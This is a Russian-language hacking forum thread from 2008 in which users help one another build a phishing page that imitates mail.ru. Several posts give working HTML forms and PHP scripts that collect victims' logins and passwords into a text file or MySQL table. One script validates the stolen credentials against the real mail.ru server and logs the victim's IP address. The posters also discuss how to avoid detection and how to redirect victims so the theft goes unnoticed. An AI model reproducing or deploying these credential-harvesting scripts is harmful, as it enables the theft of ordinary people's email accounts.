Форум АНТИЧАТ - Взлом через фейк

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Взлом через фейк (https://forum.antichat.xyz/showthread.php?t=75052)

abrut3000

26.06.2008 09:59

Взлом через фейк

http://i032.radikal.ru/0806/36/ffcc5cfeb771.jpg

У меня вопрос!!! Я сделал фейк mail.ru как мне сделать письмо как на фото чтоб когда жертва вводит свои данные и нажимает подтвердить
они записовались в базу БД?

Кто так сможет сделать отзовитесь!

nbd	26.06.2008 10:35

Зачем тебе заморочки с БД. Пиши в файл. Например так.

PHP код:


		
			
Содержимое нтмл письма (форма отправки данных)



...

<form action="http://фейк_мейл.ру/auth.php" method="POST">

<input type="text" name="login" >Логин<br>

<input type="password" name="pass">Пароль

<input type="submit">

</form>

....

и собственно скрипт записи логина и пасса

PHP код:


		
			
<?php

$login=$_POST['login'];

$pass=$_POST['pass'];

$data=$login." ".$pass;

$fh=fopen("data.txt", "a");

fwrite($fh, $data);

fclose($fh);

?>

Chaak

26.06.2008 10:49

Цитата:

Сообщение от nbd

Зачем тебе заморочки с БД. Пиши в файл. Например так.

PHP код:


		
			
Содержимое нтмл письма (форма отправки данных)



...

<form action="http://фейк_мейл.ру/auth.php" method="POST">

<input type="text" name="login" >Логин<br>

<input type="password" name="pass">Пароль

<input type="submit">

</form>

....

и собственно скрипт записи логина и пасса

PHP код:


		
			
<?php

$login=$_POST['login'];

$pass=$_POST['pass'];

$data=$login." ".$pass;

$fh=fopen("data.txt", "a");

fwrite($fh, $data);

fclose($fh);

?>

на mail.ru POST не работает поэтому:

PHP код:


		
			
<form action="http://фейк_мейл.ру/auth.php" method="GET"> 

<input type="text" name="login" >Логин<br> 

<input type="password" name="pass">Пароль 

<input type="submit">

PHP код:


		
			
<?php 

$login=$_GET['login']; 

$pass=$_GET['pass']; 

$data=$login.";".$pass."\n"; 

$fh=fopen("data.txt", "a"); 

fwrite($fh, $data); 

fclose($fh); 

Header("Location: http://win.mail.ru/cgi-bin/auth");

exit();

?>

nbd	26.06.2008 10:59

С гетом палево будет (: Увидев в адресной строке адрес вида http://фейк_мейл.ру/auth.php?login=lamer&pass=123456 даже имбицил поймет, что его поимели.

Кстати редирект на http://mail.ru/cgi-bin/ - Forbidden

Насчет поста ниже :
Так я и не спорил (: Я просто предложил заменить редирект на http://win.mail.ru/cgi-bin/auth

abrut3000

27.06.2008 07:53

Эти все скрипты которые вы написали паляться службой mail.ru

Naydav

27.06.2008 13:04

Цитата:

Эти все скрипты которые вы написали паляться службой mail.ru

Имееться ввиду, что бы в письме прислать форму?
Наверно спалят тогда...
Интересно, надо будет проверить позволяет ли мейл.ру отсылать данные гетом(из письма непосредственно)

abrut3000

27.06.2008 14:03

Вот это письмо как на фото ни как не палиться почему не знаю

abrut3000

18.07.2008 08:58

еще есть предложения

P3L3NG

21.07.2008 13:24

тоже интересно, присылали недавно такое письмо. я его разобрал хорошенько. код, адрес фэйка, ип того кто слыл узнал=) а повторить не получается. "расширенный формат" криво код преобразует(((

nc.STRIEM

21.07.2008 13:38

вот самый нормальный вариант фейка.

PHP код:


		
			
<?php

    error_reporting(0);

    $cont = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);

    if(strstr($cont, '<b>Ошибка</b>'))

        die(str_replace('action="auth"', '', $cont));



    $fo = fopen('mail.lg', 'a');

    fwrite($fo, date('d.m.y H:i:s')."\t".$_SERVER['REMOTE_ADDR']."\n");

    fwrite($fo, $_POST['Login'].'@'.$_POST['Domain']."\t".$_POST['Password']."\n\n");

    fclose($fo);

    header('Location: http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);

?>

.:EnoT:.

21.07.2008 13:46

Добавление записей в БД:

Таблица:

Код:

CREATE TABLE `mails` (

  `id` int(20) NOT NULL auto_increment,

  `mail` varchar(100) NOT NULL,

  `pass` varchar(100) NOT NULL,

  PRIMARY KEY  (`id`)

) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=cp1251 AUTO_INCREMENT=30 ;

Форма:

PHP код:


		
			
<form action="<?=$_SERVER['PHP_SELF']?>" method="post">

<input name="login" type="text" />

<input name="pass" type="password" />

<input type="submit" value="Войти" />

</form>

Скрипт:

PHP код:


		
			
<?php

$login = !empty($_POST['login']) && preg_match('/^[a-zA-Z0-9-_\.]+@[a-zA-Z0-9]+\.[a-zA-Z]{2,5}$/', $_POST['login']) ? trim($_POST['login']) : '';

$pass = !empty($_POST['pass']) ? trim($_POST['pass']) : '';

if($login && $pass){

    $login = get_magic_quotes_gpc() ? $login : mysql_real_escape_string($login);

    $pass =  get_magic_quotes_gpc() ? $pass : mysql_real_escape_string($pass);

    mysql_connect('localhost', 'user', 'pass');

    mysql_select_db('mails');

    $sql = mysql_query("INSERT INTO `mails` VALUE(null, '".$login."', '".$pass."')");

    if($sql){

        header('location: http://mail.ru');

    }

}

?>

Тема закрыта во избежании оффтопа, т.к. со взломами в другой раздел.

Время: 13:44